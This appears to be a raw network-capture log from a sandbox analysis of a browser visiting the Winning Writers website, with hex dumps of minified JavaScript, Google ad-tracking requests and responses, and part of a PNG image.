                                                                                                                                                                                            2024-11-18 20:00:08 UTC1378INData Raw: 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 65 28 72 29 26 26 28 69 3c 38 26 26 28 63 5b 69 5d 3d 6e 28 74 2e 70 6f 77 28 72 2c 2e 35 29 29 29 2c 75 5b 69 5d 3d 6e 28 74 2e 70 6f 77 28 72 2c 31 2f 33 29 29 2c 69 2b 2b 29 2c 72 2b 2b 7d 28 29 3b 76 61 72 20 73 3d 5b 5d 2c 6c 3d 61 2e 53 48 41 32 35 36 3d 6f 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 69 2e 69 6e 69 74 28 63 2e 73 6c 69 63 65 28 30 29 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77 6f 72 64 73 2c 72 3d 6e 5b 30 5d 2c 69 3d 6e 5b 31 5d 2c 6f 3d 6e 5b 32 5d 2c 61 3d 6e 5b 33
                                                                                                                                                                                            Data Ascii: r(var r=2,i=0;i<64;)e(r)&&(i<8&&(c[i]=n(t.pow(r,.5))),u[i]=n(t.pow(r,1/3)),i++),r++}();var s=[],l=a.SHA256=o.extend({_doReset:function(){this._hash=new i.init(c.slice(0))},_doProcessBlock:function(t,e){for(var n=this._hash.words,r=n[0],i=n[1],o=n[2],a=n[3
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1378INData Raw: 72 20 69 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 74 68 69 73 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 66 28 21 74 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 6e 28 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 74 79 70 65 6f 66 20 74 2b 22 20 22 2b 74 2b 22 20 69 73 20 6e 6f 74 20 69 74 65 72 61 62 6c 65 28 63 61 6e 6e 6f 74 20 72 65 61 64 20 70 72 6f 70 65 72 74 79 20 53 79 6d 62 6f 6c 28 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 29 29 22 29 29 3b 76 61 72 20 72 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 29 3b 69 66 28 30 3d 3d 3d 72 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 65 28 5b 5d 29 3b 76 61 72 20 69 3d 72 2e 6c 65 6e 67 74
                                                                                                                                                                                            Data Ascii: r i=function(t){return new this((function(e,n){if(!t||void 0===t.length)return n(new TypeError(typeof t+" "+t+" is not iterable(cannot read property Symbol(Symbol.iterator))"));var r=Array.prototype.slice.call(t);if(0===r.length)return e([]);var i=r.lengt
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1378INData Raw: 76 6f 69 64 20 64 28 74 29 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 29 72 65 74 75 72 6e 20 76 6f 69 64 20 70 28 28 72 3d 6e 2c 69 3d 65 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 61 70 70 6c 79 28 69 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2c 74 29 7d 74 2e 5f 73 74 61 74 65 3d 31 2c 74 2e 5f 76 61 6c 75 65 3d 65 2c 64 28 74 29 7d 63 61 74 63 68 28 65 29 7b 66 28 74 2c 65 29 7d 76 61 72 20 72 2c 69 7d 66 75 6e 63 74 69 6f 6e 20 66 28 74 2c 65 29 7b 74 2e 5f 73 74 61 74 65 3d 32 2c 74 2e 5f 76 61 6c 75 65 3d 65 2c 64 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 74 29 7b 32 3d 3d 3d 74 2e 5f 73 74 61 74 65 26 26 30 3d 3d 3d 74 2e 5f 64 65 66 65 72 72 65 64 73 2e 6c 65 6e 67 74 68 26 26 75 2e 5f 69 6d 6d 65 64 69 61 74 65 46 6e
                                                                                                                                                                                            Data Ascii: void d(t);if("function"==typeof n)return void p((r=n,i=e,function(){r.apply(i,arguments)}),t)}t._state=1,t._value=e,d(t)}catch(e){f(t,e)}var r,i}function f(t,e){t._state=2,t._value=e,d(t)}function d(t){2===t._state&&0===t._deferreds.length&&u._immediateFn
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1378INData Raw: 74 75 72 6e 20 6e 65 77 20 75 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 6e 28 74 29 7d 29 29 7d 2c 75 2e 72 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 75 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 66 28 21 61 28 74 29 29 72 65 74 75 72 6e 20 6e 28 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 50 72 6f 6d 69 73 65 2e 72 61 63 65 20 61 63 63 65 70 74 73 20 61 6e 20 61 72 72 61 79 22 29 29 3b 66 6f 72 28 76 61 72 20 72 3d 30 2c 69 3d 74 2e 6c 65 6e 67 74 68 3b 72 3c 69 3b 72 2b 2b 29 75 2e 72 65 73 6f 6c 76 65 28 74 5b 72 5d 29 2e 74 68 65 6e 28 65 2c 6e 29 7d 29 29 7d 2c 75 2e 5f 69 6d 6d 65 64 69 61 74 65 46 6e 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 73 65 74 49 6d 6d 65 64 69 61 74 65
                                                                                                                                                                                            Data Ascii: turn new u((function(e,n){n(t)}))},u.race=function(t){return new u((function(e,n){if(!a(t))return n(new TypeError("Promise.race accepts an array"));for(var r=0,i=t.length;r<i;r++)u.resolve(t[r]).then(e,n)}))},u._immediateFn="function"==typeof setImmediate
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1378INData Raw: 68 72 6f 77 22 3d 3d 3d 69 29 74 68 72 6f 77 20 6f 3b 72 65 74 75 72 6e 20 43 28 29 7d 66 6f 72 28 6e 2e 6d 65 74 68 6f 64 3d 69 2c 6e 2e 61 72 67 3d 6f 3b 3b 29 7b 76 61 72 20 61 3d 6e 2e 64 65 6c 65 67 61 74 65 3b 69 66 28 61 29 7b 76 61 72 20 63 3d 67 28 61 2c 6e 29 3b 69 66 28 63 29 7b 69 66 28 63 3d 3d 3d 6c 29 63 6f 6e 74 69 6e 75 65 3b 72 65 74 75 72 6e 20 63 7d 7d 69 66 28 22 6e 65 78 74 22 3d 3d 3d 6e 2e 6d 65 74 68 6f 64 29 6e 2e 73 65 6e 74 3d 6e 2e 5f 73 65 6e 74 3d 6e 2e 61 72 67 3b 65 6c 73 65 20 69 66 28 22 74 68 72 6f 77 22 3d 3d 3d 6e 2e 6d 65 74 68 6f 64 29 7b 69 66 28 22 73 75 73 70 65 6e 64 65 64 53 74 61 72 74 22 3d 3d 3d 72 29 74 68 72 6f 77 20 72 3d 22 63 6f 6d 70 6c 65 74 65 64 22 2c 6e 2e 61 72 67 3b 6e 2e 64 69 73 70 61 74 63 68
                                                                                                                                                                                            Data Ascii: hrow"===i)throw o;return C()}for(n.method=i,n.arg=o;;){var a=n.delegate;if(a){var c=g(a,n);if(c){if(c===l)continue;return c}}if("next"===n.method)n.sent=n._sent=n.arg;else if("throw"===n.method){if("suspendedStart"===r)throw r="completed",n.arg;n.dispatch
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1378INData Raw: 29 7d 28 69 2c 6f 2c 72 2c 61 29 7d 29 29 7d 72 65 74 75 72 6e 20 72 3d 72 3f 72 2e 74 68 65 6e 28 61 2c 61 29 3a 61 28 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 67 28 74 2c 65 29 7b 76 61 72 20 6e 3d 74 2e 69 74 65 72 61 74 6f 72 5b 65 2e 6d 65 74 68 6f 64 5d 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 6e 29 7b 69 66 28 65 2e 64 65 6c 65 67 61 74 65 3d 6e 75 6c 6c 2c 22 74 68 72 6f 77 22 3d 3d 3d 65 2e 6d 65 74 68 6f 64 29 7b 69 66 28 74 2e 69 74 65 72 61 74 6f 72 2e 72 65 74 75 72 6e 26 26 28 65 2e 6d 65 74 68 6f 64 3d 22 72 65 74 75 72 6e 22 2c 65 2e 61 72 67 3d 76 6f 69 64 20 30 2c 67 28 74 2c 65 29 2c 22 74 68 72 6f 77 22 3d 3d 3d 65 2e 6d 65 74 68 6f 64 29 29 72 65 74 75 72 6e 20 6c 3b 65 2e 6d 65 74 68 6f 64 3d 22 74 68 72 6f 77 22 2c 65 2e 61 72 67 3d 6e 65
                                                                                                                                                                                            Data Ascii: )}(i,o,r,a)}))}return r=r?r.then(a,a):a()}}function g(t,e){var n=t.iterator[e.method];if(void 0===n){if(e.delegate=null,"throw"===e.method){if(t.iterator.return&&(e.method="return",e.arg=void 0,g(t,e),"throw"===e.method))return l;e.method="throw",e.arg=ne
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1378INData Raw: 61 74 6f 72 46 75 6e 63 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 72 65 74 75 72 6e 21 21 65 26 26 28 65 3d 3d 3d 64 7c 7c 22 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 22 3d 3d 3d 28 65 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 65 2e 6e 61 6d 65 29 29 7d 2c 74 2e 6d 61 72 6b 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2c 68 29 3a 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 68 2c 63 28 74 2c 61 2c 22 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 22 29 29 2c 74 2e 70
                                                                                                                                                                                            Data Ascii: atorFunction=function(t){var e="function"==typeof t&&t.constructor;return!!e&&(e===d||"GeneratorFunction"===(e.displayName||e.name))},t.mark=function(t){return Object.setPrototypeOf?Object.setPrototypeOf(t,h):(t.__proto__=h,c(t,a,"GeneratorFunction")),t.p


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            45192.168.2.1649763142.250.186.1624436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1246OUTGET /pagead/viewthroughconversion/1072733940/?random=1731960006858&cv=11&fst=1731960006858&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1
                                                                                                                                                                                            Host: googleads.g.doubleclick.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:08 UTC842INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:08 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Set-Cookie: test_cookie=CheckForPermission; expires=Mon, 18-Nov-2024 20:15:08 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            2024-11-18 20:00:08 UTC536INData Raw: 31 32 39 61 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 20 3d 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 64 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c
                                                                                                                                                                                            Data Ascii: 129a(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&global
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1378INData Raw: 6c 22 2c 74 3d 7b 7d 2c 76 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 77 28 61 2c 62 2c 64 29 7b 69 66 28 21 64 7c 7c 61 21 3d 6e 75 6c 6c 29 7b 64 3d 76 5b 62 5d 3b 69 66 28 64 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 5b 62 5d 3b 64 3d 61 5b 64 5d 3b 72 65 74 75 72 6e 20 64 21 3d 3d 76 6f 69 64 20 30 3f 64 3a 61 5b 62 5d 7d 7d 20 66 75 6e 63 74 69 6f 6e 20 78 28 61 2c 62 2c 64 29 7b 69 66 28 62 29 61 3a 7b 76 61 72 20 63 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 61 3d 63 2e 6c 65 6e 67 74 68 3d 3d 3d 31 3b 76 61 72 20 65 3d 63 5b 30 5d 2c 67 3b 21 61 26 26 65 20 69 6e 20 74 3f 67 3d 74 3a 67 3d 6d 3b 66 6f 72 28 65 3d 30 3b 65 3c 63 2e 6c 65 6e 67 74 68 2d 31 3b 65 2b 2b 29 7b 76 61 72 20 66 3d 63 5b 65 5d 3b 69 66 28 21 28 66 20 69 6e 20 67 29 29 62 72
                                                                                                                                                                                            Data Ascii: l",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))br
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1378INData Raw: 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 28 62 3d 62 2e 62 72 61 6e 64 29 26 26 62 2e 69 6e 64 65 78 4f 66 28 61 29 21 3d 2d 31 7d 29 3a 21 31 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 52 28 61 29 7b 76 61 72 20 62 3b 61 3a 7b 69 66 28 62 3d 7a 2e 6e 61 76 69 67 61 74 6f 72 29 69 66 28 62 3d 62 2e 75 73 65 72 41 67 65 6e 74 29 62 72 65 61 6b 20 61 3b 62 3d 22 22 7d 72 65 74 75 72 6e 20 62 2e 69 6e 64 65 78 4f 66 28 61 29 21 3d 2d 31 7d 3b 66 75 6e 63 74 69 6f 6e 20 54 28 29 7b 72 65 74 75 72 6e 20 47 3f 21 21 4f 26 26 4f 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 55 28 29 7b 72 65 74 75 72 6e 20 54 28 29 3f 51 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 52 28 22 43 68 72 6f 6d 65 22 29 7c 7c 52 28 22 43 72
                                                                                                                                                                                            Data Ascii: unction(b){return(b=b.brand)&&b.indexOf(a)!=-1}):!1:!1}function R(a){var b;a:{if(b=z.navigator)if(b=b.userAgent)break a;b=""}return b.indexOf(a)!=-1};function T(){return G?!!O&&O.brands.length>0:!1}function U(){return T()?Q("Chromium"):(R("Chrome")||R("Cr
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1378INData Raw: 73 3d 6e 2e 62 72 6f 77 73 69 6e 67 54 6f 70 69 63 73 29 29 3b 74 72 79 7b 76 61 72 20 53 3d 43 2e 66 65 74 63 68 28 71 2c 49 29 3b 53 26 26 53 2e 63 61 74 63 68 28 42 29 3b 76 61 72 20 4a 3d 21 30 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 62 61 29 7b 7d 7d 69 66 28 6e 26 26 6e 2e 6e 6f 46 61 6c 6c 62 61 63 6b 29 4a 3d 21 31 3b 65 6c 73 65 7b 74 72 79 7b 76 61 72 20 63 61 3d 44 2e 73 65 6e 64 42 65 61 63 6f 6e 26 26 44 2e 73 65 6e 64 42 65 61 63 6f 6e 28 71 29 7d 63 61 74 63 68 28 62 61 29 7b 41 2e 54 41 47 47 49 4e 47 3d 41 2e 54 41 47 47 49 4e 47 7c 7c 5b 5d 2c 41 2e 54 41 47 47 49 4e 47 5b 31 35 5d 3d 21 30 7d 63 61 7c 7c 46 28 71 29 3b 4a 3d 21 30 7d 7d 4a 26 26 65 28 29 7d 7d 28 66 29 29 29 3b 72 2e 6f 6e 6c 6f 61 64 3d 65 3b 72 2e 73 72 63 3d 64
                                                                                                                                                                                            Data Ascii: s=n.browsingTopics));try{var S=C.fetch(q,I);S&&S.catch(B);var J=!0;break a}catch(ba){}}if(n&&n.noFallback)J=!1;else{try{var ca=D.sendBeacon&&D.sendBeacon(q)}catch(ba){A.TAGGING=A.TAGGING||[],A.TAGGING[15]=!0}ca||F(q);J=!0}}J&&e()}}(f)));r.onload=e;r.src=d
                                                                                                                                                                                            2024-11-18 20:00:08 UTC100INData Raw: 4c 37 64 38 5f 74 61 68 77 6f 75 46 6b 57 45 4d 50 68 4d 47 71 73 31 34 31 51 6f 41 68 58 6e 73 51 5c 78 32 36 72 61 6e 64 6f 6d 5c 78 33 64 32 38 30 38 38 30 35 31 39 33 5c 78 32 36 72 6d 74 5f 74 6c 64 5c 78 33 64 30 5c 78 32 36 69 70 72 5c 78 33 64 79 27 5d 2c 20 5b 5d 29 3b 7d 29 28 29 3b 0d 0a
                                                                                                                                                                                            Data Ascii: L7d8_tahwouFkWEMPhMGqs141QoAhXnsQ\x26random\x3d2808805193\x26rmt_tld\x3d0\x26ipr\x3dy'], []);})();
                                                                                                                                                                                            2024-11-18 20:00:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            46192.168.2.1649764142.250.185.1304436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:08 UTC1370OUTGET /td/rul/1072733940?random=1731960006858&cv=11&fst=1731960006858&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config HTTP/1.1
                                                                                                                                                                                            Host: td.doubleclick.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                            Sec-Fetch-Dest: iframe
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:08 UTC785INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:08 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Set-Cookie: test_cookie=CheckForPermission; expires=Mon, 18-Nov-2024 20:15:08 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            2024-11-18 20:00:08 UTC18INData Raw: 64 0d 0a 3c 68 74 6d 6c 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                            Data Ascii: d<html></html>
                                                                                                                                                                                            2024-11-18 20:00:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            47192.168.2.164977366.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:08 UTC675OUTGET //assets/images/insta_heart.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007
                                                                                                                                                                                            2024-11-18 20:00:08 UTC370INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:08 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Tue, 09 Mar 2021 17:09:44 GMT
                                                                                                                                                                                            ETag: "7f3c-5bd1d9de0a600"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 32572
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:08 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:08 UTC7822INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 06 ee 00 00 06 2a 08 06 00 00 00 3f f2 98 f9 00 00 7f 03 49 44 41 54 78 da ec dd 07 94 25 57 7d e0 e1 1e 45 10 02 11 64 10 c9 e4 cc ee 02 22 c7 06 a4 ee ba d5 33 c3 68 e4 7b ab 07 21 2c db a0 05 0c 06 c3 12 bd 30 78 09 ab 25 98 b0 b6 c1 04 13 45 58 92 c0 60 72 b0 49 c2 06 03 36 08 61 01 c2 48 8c a6 ab aa 47 c1 d2 20 0d d2 f4 de db 1a 1b 21 14 26 74 78 e1 fb 9d f3 1d c9 98 83 46 fd aa 6e dd 7a ff 7e f5 26 26 24 49 92 24 49 92 24 49 92 24 49 92 a4 41 6b cb ba 75 87 74 d3 1b 6f de cf 34 77 9b 0f cd 03 e7 aa 34 dd d6 29 75 55 3c 31 7b 76 57 a7 17 67 7f d6 87 f4 fa 36 a4 b7 e7 bf 7f 4f fe cf 4f c9 7f ff 99 2e a4 2f 75 21 fe 53 fe ff fd 73 17 9a 9f e6 ff fb 9c ec bc 2b b9 38 5b d8 0b db af e2 7f eb e7 8b ff
                                                                                                                                                                                            Data Ascii: PNGIHDR*?IDATx%W}Ed"3h{!,0x%EX`rI6aHG !&txFnz~&&$I$I$I$IAkuto4w4)uU<1{vWg6OO./u!Ss+8[
